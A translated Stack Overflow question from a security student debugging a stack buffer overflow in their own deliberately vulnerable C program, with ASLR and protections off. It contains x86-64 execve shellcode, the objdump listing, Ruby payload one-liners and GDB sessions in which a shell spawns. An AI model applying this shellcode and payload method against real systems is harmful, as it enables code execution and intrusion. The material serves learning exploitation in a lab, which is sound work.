Note: I've already asked this question in Stackoverflow in Portuguese Language: https://pt.stackoverflow.com/questions/76571/seguran%C3%A7a-syscall-dentro-de-shellcode-n%C3%A3o-executa. But it seems to be a really hard question, so this question is just a translation of the question in portuguese.
I'm studying Information Security and performing some experiments trying to exploit a classic case of buffer overflow.
I've succeeded in the creation of the shellcode, its injection inside the vulnerable program and in its execution. My problem is that a syscall to execve()
to get a shell does not work.
In more details:
This is the code of the vulnerable program (compiled in a Ubuntu 15.04 x88-64, with the following gcc flags: "-fno-stack-protector -z execstack -g" and with the ASLR turned off):
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
int do_bof(char *exploit) {
char buf[128];
strcpy(buf, exploit);
return 1;
}
int main(int argc, char *argv[]) {
if(argc < 2) {
puts("Usage: bof <any>");
return 0;
}
do_bof(argv[1]);
puts("Failed to exploit.");
return 0;
}
This is a small assembly program that spawn a shell and then exits. Note that this code will work independently. This is: If I assemble, link and run this code alone, it will work.
global _start
section .text
_start:
jmp short push_shell
starter:
pop rdi
mov al, 59
xor rsi, rsi
xor rdx, rdx
xor rcx, rcx
syscall
xor al, al
mov BYTE [rdi], al
mov al, 60
syscall
push_shell:
call starter
shell:
db "/bin/sh"
This is the output of a objdump -d -M intel of the above program, where the shellcode were extracted from (note: the language of the output is portuguese):
spawn_shell.o: formato do arquivo elf64-x86-64
Desmontagem da seção .text:
0000000000000000 <_start>:
0: eb 16 jmp 18 <push_shell>
0000000000000002 <starter>:
2: 5f pop rdi
3: b0 3b mov al,0x3b
5: 48 31 f6 xor rsi,rsi
8: 48 31 d2 xor rdx,rdx
b: 48 31 c9 xor rcx,rcx
e: 0f 05 syscall
10: 30 c0 xor al,al
12: 88 07 mov BYTE PTR [rdi],al
14: b0 3c mov al,0x3c
16: 0f 05 syscall
0000000000000018 <push_shell>:
18: e8 e5 ff ff ff call 2 <starter>
000000000000001d <shell>:
1d: 2f (bad)
1e: 62 (bad)
1f: 69 .byte 0x69
20: 6e outs dx,BYTE PTR ds:[rsi]
21: 2f (bad)
22: 73 68 jae 8c <shell+0x6f>
This command would be the payload, which inject the shellcode along with the needed nop sleed and the return address that will overwrite the original return address:
ruby -e 'print "\x90" * 103 + "\xeb\x13\x5f\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x0f\x05\x30\xc0\x88\x07\xb0\x3c\x0f\x05\xe8\xe8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\xd0\xd8\xff\xff\xff\x7f"'
So far, I've already debugged my program with the shellcode injected very carefully, paying attention to the RIP register seeing where the execution goes wrong. I've discovered that:
- The return address is correctly overwritten and the execution jumps to my shellcode.
- The execution goes alright until the "e:" line of my assembly program, where the syscall to
execve()
happens. - The syscall simply does not work, even with the register correctly set up to do a syscall. Strangely, after this line, the RAX and RCX register bits are all set up.
The result is that the execution goes to the non-conditional jump that pushes the address of the shell again and a infinity loop starts until the program crash in a SEGFAULT.
That's the main problem: The syscall won't work.
Some notes:
- Some would say that my "/bin/sh" strings needs to be null terminated. Well, it does not seem to be necessary, nasm seems to put a null byte implicitly, and my assembly program works, as I stated.
- Remember it's a 64 bit shellcode.
This shellcode works in the following code:
char shellcode[] = "\xeb\x0b\x5f\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x0f\x05\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"; int main() { void (*func)(); func = (void (*)()) shellcode; (void)(func)(); }
What's wrong with my shellcode?
EDIT 1:
Thanks to the answer of Jester, the first problem was solved. Additionaly, I discovered that a shellcode has not the requirement of work alone. The new Assembly code for the shellcode is:
spawn_shell: formato do arquivo elf64-x86-64
Desmontagem da seção .text:
0000000000400080 <_start>:
400080: eb 1e jmp 4000a0 <push_shell>
0000000000400082 <starter>:
400082: 5f pop %rdi
400083: 48 31 c0 xor %rax,%rax
400086: 88 47 07 mov %al,0x7(%rdi)
400089: b0 3b mov $0x3b,%al
40008b: 48 31 f6 xor %rsi,%rsi
40008e: 48 31 d2 xor %rdx,%rdx
400091: 48 31 c9 xor %rcx,%rcx
400094: 0f 05 syscall
400096: 48 31 c0 xor %rax,%rax
400099: 48 31 ff xor %rdi,%rdi
40009c: b0 3c mov $0x3c,%al
40009e: 0f 05 syscall
00000000004000a0 <push_shell>:
4000a0: e8 dd ff ff ff callq 400082 <starter>
4000a5: 2f (bad)
4000a6: 62 (bad)
4000a7: 69 .byte 0x69
4000a8: 6e outsb %ds:(%rsi),(%dx)
4000a9: 2f (bad)
4000aa: 73 68 jae 400114 <push_shell+0x74>
If I assemble and link it, it will not work, but if a inject this in another program as a payload, it will! Why? Because if I run this program alone, it will try to terminate an already NULL terminated string "/bin/sh". The OS seems to do an initial setup even for assembly programs. But this is not true if I inject the shellcode, and more: The real reason of my syscall didn't have succeeded is that the "/bin/sh" string was not NULL terminated in runtime, but it worked as a standalone program because in this case, it was NULL terminated.
Therefore, you shellcode run alright as a standalone program is not a proof that it works.
The exploitation was successfull... At least in GDB. Now I have a new problem: The exploit works inside GDB, but doesn't outside it.
$ gdb -q bof3
Lendo símbolos de bof3...concluído.
(gdb) r (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48\ x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')
Starting program: /home/sidao/h4x0r/C-CPP-Projects/security/bof3 (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48\x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')
process 13952 está executando novo programa: /bin/dash
$ ls
bof bof2.c bof3_env bof3_new_shellcode.txt bof3_shellcode.txt get_shell shellcode_exit shellcode_hello.c shellcode_shell2
bof.c bof3 bof3_env.c bof3_non_dbg func_stack get_shell.c shellcode_exit.c shellcode_shell shellcode_shell2.c
bof2 bof3.c bof3_gdb_env bof3_run_env func_stack.c shellcode_bof.c shellcode_hello shellcode_shell.c
$ exit
[Inferior 1 (process 13952) exited normally]
(gdb)
And outside:
$ ./bof3 (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')
fish: Job 1, “./bof3 (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48\x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')” terminated by signal SIGSEGV (Address boundary error)
Immediately I searched about it and found this question: Buffer overflow works in gdb but not without it
Initially I thought it was just matter of unset two environment variables and discover a new return address, but unset two variables had not made the minimal difference:
$ gdb -q bof3
Lendo símbolos de bof3...concluído.
(gdb) unset env COLUMNS
(gdb) unset env LINES
(gdb) r (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48\x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')
Starting program: /home/sidao/h4x0r/C-CPP-Projects/security/bof3 (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48\x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')
process 14670 está executando novo programa: /bin/dash
$
So now, this is the second question: Why the exploit works inside GDB but does not outside it?